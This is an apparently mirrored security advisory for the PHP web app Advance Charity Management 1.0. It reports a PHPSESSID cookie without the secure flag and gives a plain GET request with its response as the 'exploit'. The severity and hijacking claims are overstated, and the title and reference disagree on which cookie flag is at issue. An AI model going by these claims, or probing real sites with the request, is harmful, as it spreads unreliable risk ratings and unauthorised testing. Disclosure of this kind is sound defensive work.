Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:172713
HistoryJun 05, 2023 - 12:00 a.m.

Advance Charity Management 1.0 Insecure Settings

2023-06-0500:00:00
nu11secur1ty
packetstormsecurity.com
155
JSON
`## Title: Advance Charity Management-1.0 - TLS cookie without secure  
flag set-PHPSESSID NEVER EXPIRATION-current session-Hijacking  
## Author: nu11secur1ty  
## Date: 06.04.2023  
## Vendor: https://www.sourcecodester.com/users/aown-shah  
## Software: https://www.sourcecodester.com/php/16607/advance%C2%A0charity-management-system.html  
## Reference: https://portswigger.net/kb/issues/00500600_cookie-without-httponly-flag-set  
  
## Description:  
The following cookie was issued by the application and does not have  
the secure flag set:  
PHPSESSID: The cookie appears to contain a session token, which may  
increase the risk associated with this issue. You should review the  
contents of the cookie to determine its function. The attacker can use  
the same browser on the same machine to connect with the already  
logged user before this moment, end he can do very nasty stuff with  
this already authenticated account. This is a 100% CRITICAL SITUATION  
if this will happen  
inside of the network level 2 of some companies.  
  
STATUS: HIGH Vulnerability  
  
[+]Exploit:  
```GET  
GET /pwnedhost7/members/ HTTP/1.1  
Host: pwnedhost7.com  
Accept-Encoding: gzip, deflate  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Referer: https://pwnedhost7.com/pwnedhost7/  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="114", "Chromium";v="114"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
  
```  
  
[+]Response:  
```HTTP  
HTTP/1.1 200 OK  
Date: Sun, 04 Jun 2023 10:13:00 GMT  
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30  
X-Powered-By: PHP/7.4.30  
Set-Cookie: PHPSESSID=hudiao5n9p6rjld5oaju24lbca; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 25629  
  
<script type="text/javascript">window.location="login.php"; </script><br />  
<b>Notice</b>: Undefined index: rainbow_uid in  
<b>C:\xampp7.4\htdocs\pwnedhost7\members\header.php</b> on line  
<b>7</b><br />  
<br />  
<b>Warning</b>: mysqli_fetch_assoc() expects parameter 1 to be  
mysqli_result, bool given in  
<b>C:\xampp7.4\htdocs\pwnedhost7\members\header.php</b> on line  
<b>12</b>  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Aown-Shah/2023/Advance-Charity-Management-1.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/06/advance-charity-management-10-tls.html)  
  
## Time spend:  
00:37:00  
  
  
`
JSON